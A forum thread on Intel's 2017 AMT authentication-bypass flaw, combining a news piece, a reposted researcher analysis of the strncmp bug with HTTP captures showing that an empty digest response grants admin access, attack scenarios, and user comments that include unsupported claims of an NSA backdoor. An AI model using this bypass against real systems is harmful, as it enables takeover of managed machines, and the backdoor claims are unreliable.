Intel Issues Patch for Remote Code-Execution Bug Affecting Chips for a Decade

[CrAKeN]

 

Intel patches decade-old bug

 

Intel has issued a security advisory regarding a critical flaw that has been affecting its processors for almost a decade. 

 

The vulnerability resides in the Active Management Technology, Intel Small Business Technology, and Intel Standard Manageability. This is a feature that's mostly used for computers running vPro processors bought by business customers and is used to administer large fleets of computers.

 

Regular users shouldn't be too concerned because the bug doesn't affect chips running on consumer PCs. The situation, however, is critical and has been marked as such.

 

"There is an escalation of privilege vulnerability in Intel® Active Management Technology (AMT), Intel® Standard Manageability (ISM), and Intel® Small Business Technology versions firmware versions 6.x, 7.x, 8.x 9.x, 10.x, 11.0, 11.5, and 11.6 that can allow an unprivileged attacker to gain control of the manageability features provided by these products. This vulnerability does not exist on Intel-based consumer PCs," reads the advisory.

 

According to the company, the vulnerability may be exploited in two ways. The first is through an unprivileged network attacker who could gain system privileges to provisioned Intel manageability SKUs, namely the three aforementioned tools.

 

The second is through an unprivileged local attacker that could provision manageability features gaining unprivileged network or local system privileges on the three affected tools.

 

Nasty situation, but not that dire

Ever since the advisory was made public, security experts have been trying to figure out what impact this vulnerability has in the real world. One researcher, for instance, claims that every Intel platform had a remotely exploitable security hole that had gone unfixed for years and that it could likely be exploited over the Internet only when the AMT service was enabled and provisioned inside a network.

 

Others are equally relaxed about the situation. While the vulnerability is problematic, for an attacker to succeed, the Windows software called Local Manageability Service would have to be running too. In short, only servers running that service with the port reachable are exposed to remote code execution.

 

Using the Shodan computer search engine, just over 6,200 servers had ports 16992 or 16993 open, which is required for a remote attack.

 

Source

[Sylence]

An authentication bypass vulnerability, which will be later known as CVE-2017-5689, was originally discovered in mid-February of 2017 while doing side-research on the internals of Intel ME firmware. The first objects of interest were network services and protocols.

 

While studying the Intel AMT Implementation and Reference Guide we found out that various AMT features are available through the AMT Web-panel, which is supported by the integrated Web server, which listens to ports 16992 and 16993. To protect the AMT from unauthorized access, the Web server provides several methods of authentication and authorization of a remote user. As stated in Authentication Options section of the «Intel AMT Implementation and Reference Guide»:

 

 

Quote

Intel AMT supports both Digest and Kerberos authentication... An exception to this is the admin account, which always uses digest authentication. Continuous use of digest authentication implies that each HTTP request must be sent twice, since the first attempt results in a 401 Digest challenge response.

«An admin account which is present by default and always uses digest authentication» seemed like an interesting thing to dig deeper into.

 

Reverse-engineering the firmware

Take a look at the example of the negotiation between AMT Web server and a remote client: 

 

GET /index.htm HTTP/1.1
Host: 192.168.1.2:16992
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate 
Referer: http://192.168.1.2:16992/logon.htm 
Connection: keep-alive 

HTTP/1.1 401 Unauthorized 
WWW-Authenticate: Digest realm=»Digest:048A0000000000000000000000000000», nonce=»Q0UGAAQEAAAV4M4iGF4+Ni5ZafuMWy9J»,stale=»false»,qop=»auth» 
Content-Type: text/html 
Server: AMT

Content-Length: 678 
Connection: close 
GET /index.htm HTTP/1.1 
Host: 192.168.1.2:16992 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Referer: http://192.168.1.2:16992/logon.htm 
Connection: keep-alive 
Authorization: Digest username=»admin», realm=»Digest:048A0000000000000000000000000000», nonce=»Q0UGAAQEAAAV4M4iGF4+Ni5ZafuMWy9J», uri=»/index.htm», response=»d3d4914a43454b159a3fa6f5a91d801d», qop=auth, nc=00000001, cnonce=»9c5beca4011eea5c» 
HTTP/1.1 200 OK Date: Thu, 4 May 2017 16:03:49 GMT 
Server: AMT Content-Type: 
text/html Transfer-Encoding: chunked Cache-Control: no cache 
Expires: Thu, 26 Oct 1995 00:00:00 GMT 04E6 

 

 

With the right scripts at hand it didn’t take long to load the firmware into the disassembler and pinpoint the authentication code, via xrefs, to quite specific strings, such as «cnonce», «realm», and others.

 

 

 

The figure shows a part of the function which is located @ 0x20431E74 in the NETSTACK module of Intel ME firmware version 9.0.30.1482, where the bug was originally discovered. This function is responsible for analyzing the «Authorization» header from the client’s HTTP request and validating the user provided response to the server challenge. Let’s move along the function’s code and note where the parsed values from the Authorization header are stored, which as we proceed:
 

 

 

Finally, we will come to the where To-Be-Or-Not-To-Be decision takes place, and it looks like this:

 

 

 

 

 

The part where the call to strncmp() occurs seems most interesting here:

if(strncmp(computed_response, user_response, response_length)) exit(0x99); 

 

The value of the computed response, which is the first argument, is being tested against the one that is provided by user, which is the second argument, while the third argument is the length of the response. It seems quite obvious that the third argument of strncmp() should be the length of computed_response , but  the address of the stack variable response_length , from where the length is to be loaded, actually points to the length of the user_response ! Given an empty string the strncmp() evaluates to zero thus accepting and invalid response as a valid one. No doubt it’s just a programmer’s mistake, but here it is: keep silence when challenged and you’re in.

 

 

Exploitation example

 

With a little help of the local proxy at 127.0.0.1:16992 , which is meant to replace the response with an empty string, we’re able to manage the AMT via the regular Web browser as if we’ve known the admin password: 

 

 

GET /index.htm HTTP/1.1 
Host: 127.0.0.1:16992 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Connection: keep-alive 
HTTP/1.1 401 Unauthorized WWW-Authenticate: Digest realm=»Digest:048A0000000000000000000000000000», nonce=»qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n»,stale=»false»,qop=»auth» 
Content-Type: text/html 
Server: AMT 
Content-Length: 678 
Connection: close 
GET /index.htm HTTP/1.1 
Host: 127.0.0.1:16992 
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-US,en;q=0.5 
Accept-Encoding: gzip, deflate 
Connection: keep-alive 
Authorization: Digest username=»admin», realm=»Digest:048A0000000000000000000000000000», nonce=»qTILAAUFAAAjY7rDwLSmxFCq5EJ3pH/n», uri=»/index.htm», response=»», qop=auth, nc=00000001, cnonce=»60513ab58858482c»
5

HTTP/1.1 200 OK 
Date: Thu, 4 May 2017 16:09:17 GMT 
Server: AMT 
Content-Type: text/html 
Transfer-Encoding: chunked 
Cache-Control: no cache 
Expires: Thu, 26 Oct 1995 00:00:00 GMT 04E6

 

Possible attack scenarios

Now let us talk about what a possible attacker could do after gaining an access to the AMT services. First of all, you should remember that Intel AMT provides the ability to remotely control the computer system even if it’s powered off (but connected to the electricity mains and network). Also, Intel AMT is completely independent of OS installed on the computer system. In fact, this technology allows to remotely delete or reinstall it. So, there are several possible attack scenarios that could be conducted using the mentioned vulnerability. These are based on the following Intel AMT features: • KVM (remote control of mouse keyboard and monitor), you can use this capability to remotely perform any common physical actions (with mouse, keyboard) you do locally and usually when you working with your PC. Which means, you can remotely load, execute any program to the target system, read/write any file (using the common file explorer) etc. • IDE-R (IDE Redirection), you can remotely change the boot device to some other virtual image for example (so the system won’t boot your usual Operating System from your hard drive, but will boot the image(virtual disk) from the source specified remotely) • SOL (Serial over LAN), you can remotely power on/power off/reboot/reset and do other actions with this feature. Also, it can be used to access BIOS setup for editing.
 

 

 

[Sylence]

Ok looks like Intel loves NSA. they put backdoor but now that people found out about that they call it "bug". 

 

Intel users better use custom BIOS as a temporary workaround or if their systems support "coreboot" then use it instead since it's open source as well. or buy a backup BIOS chip for your main board then flash custom BIOS on one of those, some custom BIOS even let you OC non-K CPUS as well.

 

in case you're wondering what that all means, it means anyone, NSA in particular, can read your Hard Drive data, they have formatting tools which can work remotely they just have to log into your BIOS through your Network card. you know when your PC is on power but shut down, your Network card is still active?

 

this is a lot worse for those using DMZ or exposed host, that just means you're granting NSA your WAN access.

 

 

[steven36]

 

 

Quote

 

Install Firmware Update to Patch the Vulnerability NOW!

The bug affects Intel manageability firmware versions 6.x, 7.x, 8.x 9.x, 10.x, 11.0, 11.5, and 11.6 for Intel's AMT, ISM, and SBT platforms. However, versions before 6 or after 11.6 are not impacted.

Intel has rated the vulnerability as highly critical and released new firmware versions, instructions to detect if any workstation runs AMT, ISM, or SBT, a detection guide to check if your system is vulnerable, and a mitigation guide for those organizations that can not immediately install updates.

So, the Intel customers are strongly recommended to install a firmware patch without wasting a single second.

Also, there's a simple mitigation tool available on Github, created by Malware researcher Bart Blaze, which is based on the Mitigation Guide provided by Intel.

All an affected user has to do is, just download and run DisableAMT.exe, it will disable Intel AMT on Windows operating system (x86 and x64).

 

http://thehackernews.com/2017/05/intel-amt-vulnerability.html

 

[Sylence]

https://news.ycombinator.com/item?id=14275884

https://www.ssh.com/vulnerability/intel-amt/

https://www.embedi.com/files/white-papers/Silent-Bob-is-Silent.pdf

 

[Batu69]

Topic has been merged.

 

---

 

Quote

Exploit to pwn systems using vPro and AMT

Code dive You can remotely commandeer and control computers that use vulnerable Intel chipsets by sending them empty authentication strings.

 

You read that right. When you're expected to send a password hash, you send zero bytes. Nothing. Nada. And you'll be rewarded with powerful low-level access to a vulnerable box's hardware from across the network – or across the internet if the management interface faces the public web.

 

Remember that the next time Intel, a $180bn international semiconductor giant, talks about how important it treats security.

 

To recap: Intel provides a remote management toolkit called AMT for its business and enterprise-friendly processors; this software is part of Chipzilla's vPro suite and runs at the firmware level, below and out of sight of Windows, Linux, or whatever operating system you're using.

 

The code runs on Intel's Management Engine, a tiny secret computer within your computer that has full control of the hardware and talks directly to the network port, allowing a device to be remotely controlled regardless of whatever OS and applications are running, or not, above it.

How to remote hijack computers using Intel's insecure chips: Just use an empty login string

[steven36]

This  exploit had been present  for 9 years now , If the NSA was using it by now they have some other backdoor  NSA hacks on a large scale and once a bug is patched  it's not really viable for them too use known malware but still it needs patched because now everybody knows about it ,  As long as there is no open source hardware and people keep using these giant vendors back doors will always remain, illegal ones and maybe soon it may become legal. Its not just the NSA  who is interested in this  . Some countries have already pass laws making this sort of thing legal .In  the UK you can get put in jail  for exposing backdoors like this even that is just one example of a country that legalized it.

[vibranium]

Wait a week. There's more to come.

 

There are rumblings that the Security Advisory is not telling the whole story.

 

[steven36]

It's already  been known since the beginning   of May to the public,  computer vendors  say the arrival of new frimware will arrive sometime in May or June  . Most vendors never tell you what really happened  and they don't tell  a lot of times when hacking tools get stolen the Government warns them ahead of time . Whenever some researcher  tells a vendor about a bug they may be independent but the government is known to hire them and they could be being paid .  

 

Look how long people were in the dark about the NSA , before 2013 and Snowden  , people who talked about such things were labeled nutbags and no longer is the USA under Obama's watch this is yet again a old bug  most likely used when Obama  was in there . Trump is trying kill out everything that Obama done so things are no longer the same.

 

The era of Obama's war on whistle blowers is over and Obama even pardon some of them in the end. But now things are going too like before Obama was in there ..Trump dont want the press too know nothing and hes told Government Agencies to not talk too the press  and If you do you risk losing  you're job many already have lost there job in just a few mths..

[Sylence]

Trump wants people to think that he is against what NSA is doing, but that's a lie.

[steven36]

Trump is the Director of the National Security Agency's  Boss they have to answer too him ,hes out too change the NSA  I know that much.   If they used section 702 to spy on you would you like it much it's not just Trump  that's  questioning  the NSA . Now Rand Paul thanks  NSA spied on him too

 

Rand Paul Wants to Know if Intelligence Community Spied On Him

http://www.rollcall.com/news/politics/rand-paul-wants-know-intelligence-community-spied

There You Have It: Obama Admin. Spied On Trump, His Staff, Congress, & Trump Supporters

http://washingtonfeed.com/there-you-have-it-obama-admin-spied-on-trump-his-staff-congress-trump-supporters.html

 

[Sylence]

Intel didn't fix everything, just 50% so that people will shut up about it.

backdoor of course it's still there, with the reserved password, they don't even mention it there. people found it out through RE, they just decompiled the BIOS of many mainboards.

 

 you think the NSA would let them fix everything? too naive.

 they would have to release the PSP so Intel won't be able to hide anything anymore. AMD did that. their whole firmware is a fucking blob.
 

[Sylence]

3 hours ago, steven36 said:

Trump is the Director of the National Security Agency's  Boss they have to answer too him ,hes out too change the NSA  I know that much.   If they used section 702 to spy on you would you like it much it's not just Trump  that's  questioning  the NSA . Now Rand Paul thanks  NSA spied on him too

 

Rand Paul Wants to Know if Intelligence Community Spied On Him

http://www.rollcall.com/news/politics/rand-paul-wants-know-intelligence-community-spied

There You Have It: Obama Admin. Spied On Trump, His Staff, Congress, & Trump Supporters

http://washingtonfeed.com/there-you-have-it-obama-admin-spied-on-trump-his-staff-congress-trump-supporters.html

 

 

 

wtf? why are you talking about politic shit here. it's a computer and tech topic. 

[steven36]

14 hours ago, saeed_dc said:

 

 

wtf? why are you talking about politic shit here. it's a computer and tech topic. 

No I was not talking about politics.. I was talking about some who are involved in politics being spied on by the NSA  witch is about  privacy  and security . I didn't say to vote for them or that I even liked these people. ,If they spy on them they sure would spy on me or you is what I'm saying. You was the one who was talking about who liked who I could care less  if he likes the NSA or not he still is there boss .Only if I worked for the NSA would I care he don't pay my bills. Trump is not only the president hes also commander  and chief of the military and NSA is part of it.  NSA  was invented by a president  along time ago.

 

Some  left winged people, thought  Trump was a nutbag  when he said he was  spied on. But like I told them before, someone must  of told him this info and he had his reasons and too come to find out it was a fact he was spied on . I pays too be paranoid now days .

 

There is no proof  NSA  used this Intel exploit too spy on people yet..They may have I dont know ..But tell it's proven it's not facts  Unless someone investigates  it no one would really know and even though there being investigated for spying on people  if they found out it was so it dont  mean they would tell us .

 

It could of been used by  the NSA  or  any other Government  agency in the whole world  or it could of been being used by blackhats  or maybe it was never used at all,tell it was found out by the researcher . There is endless theories you could use .Exploits are used all the time and  not all malware is written by state actors. Intel didn't say if it was being exploited in the wild or not did they?

 

Quote

Gadget_Guy
Why would they make a backdoor that was this sloppy? Surely they would just hard code a fixed password and then make it look like the system was secure. It seems far more likely to be the result of incompetence than collusion with any three-letter agency.

 

 

 

2013 was a long time ago and what info Snowden had was already old back in 2013,  we have no idea  what the NSA does today very much but them spying on people that were soon too be there boss shows they still up too there old tricks. 

 

Some People believe anything, even once they posted on this site Snowden was dead and a bunch beloved it  on here but I didn't believe it for a minute because dead people cant delete twitter post ! 

[Sylence]

2 hours ago, steven36 said:

No I was not talking about politics.. I was talking about some who are involved in politics being spied on by the NSA  witch is about  privacy  and security . I didn't say to vote for them or that I even liked these people. ,If they spy on them they sure would spy on me or you is what I'm saying. You was the one who was talking about who liked who I could care less  if he likes the NSA or not he still is there boss .Only if I worked for the NSA would I care he don't pay my bills. Trump is not only the president hes also commander  and chief of the military and NSA is part of it.  NSA  was invented by a president  along time ago.

 

Some  left winged people, thought  Trump was a nutbag  when he said he was  spied on. But like I told them before, someone must  of told him this info and he had his reasons and too come to find out it was a fact he was spied on . I pays too be paranoid now days .

 

There is no proof  NSA  used this Intel exploit too spy on people yet..They may have I dont know ..But tell it's proven it's not facts  Unless someone investigates  it no one would really know and even though there being investigated for spying on people  if they found out it was so it dont  mean they would tell us .

 

It could of been used by  the NSA  or  any other Government  agency in the whole world  or it could of been being used by blackhats  or maybe it was never used at all,tell it was found out by the researcher . There is endless theories you could use .Exploits are used all the time and  not all malware is written by state actors. Intel didn't say if it was being exploited in the wild or not did they?

 

 

of course they never admit if a exploit in their product were used and the exploit is still there and yes of course they still keep it open for NSA. I told the reason above.

 

once NSA come to AMD they can't hide malicious code in their BIOS because they made it public.

[steven36]

58 minutes ago, saeed_dc said:

 

of course they never admit if a exploit in their product were used and the exploit is still there and yes of course they still keep it open for NSA. I told the reason above.

 

once NSA come to AMD they can't hide malicious code in their BIOS because they made it public.

Tell there is any  real proof they even used it it's just a theory  and it was Intel fault and blaming  it on anyone else is just pointing fingers  . This don't look like the NSA work they take a great deal of care too not be found out . Only time  anyone has found out what any 3 letter agency  exploits were was ether someone stole the info or it was talked about in court  .It's like the FBI's Tor Exploit  we know it exist because they talked about it  in court but still we don't how it's done . So sometimes they do admit to it but just because you know it exist don't make you any safer from it unless the code is exposed .

 

And it don't matter if the code is open if you don't know what the exploit is it can't be  patched  . Most exploits found in open source were as old as this one and there was no proof NSA ever used them ether. Only thing if hardware was open source  it would make it harder to exploit  but that  would not stop it from happening. .Also open source gets patched faster .  In Windows AMD still provide old drivers too Microsoft that's  not been updated in years  for old hardware they only pulled them from use in Linux and updated it for old hardware .

[Recruit]

I have 3 ThinkPad laptops and all of them are vulnerable.....
Lenovo said that an update from one of them is expected for 06/05/2017 but nothing until now....

 

 

 

 

[steven36]

You can use the  tool  from github  and disable it from the BIOS if you dont want too wait.

[Recruit]

32 minutes ago, steven36 said:

You can use the  tool  from github  and disable it from the BIOS if you dont want too wait.

 

Does this tool do more than a simple disable of Intel AMT from bios ?
Because I made that yesterday.

[Sylence]

 

Lmao

[Atasas]

Let me sway a bit from the topic in a sense, anybody had tested to any hardware software suites for update processes?

I have and apart from obvious-oblivious Intel, my old Belkin used to connect to belkin every day for data checking and only way to disable it it was in giving up admin suite and limiting connections manually via windows connections center... which I "trust"...

Nobody is safe!

[steven36]

4 hours ago, Recruit said:

 

Does this tool do more than a simple disable of Intel AMT from bios ?
Because I made that yesterday.

What is does it  disables the AMT. and gives you a option  to automatically disable Intel Local Management Service by renaming the file  if you want.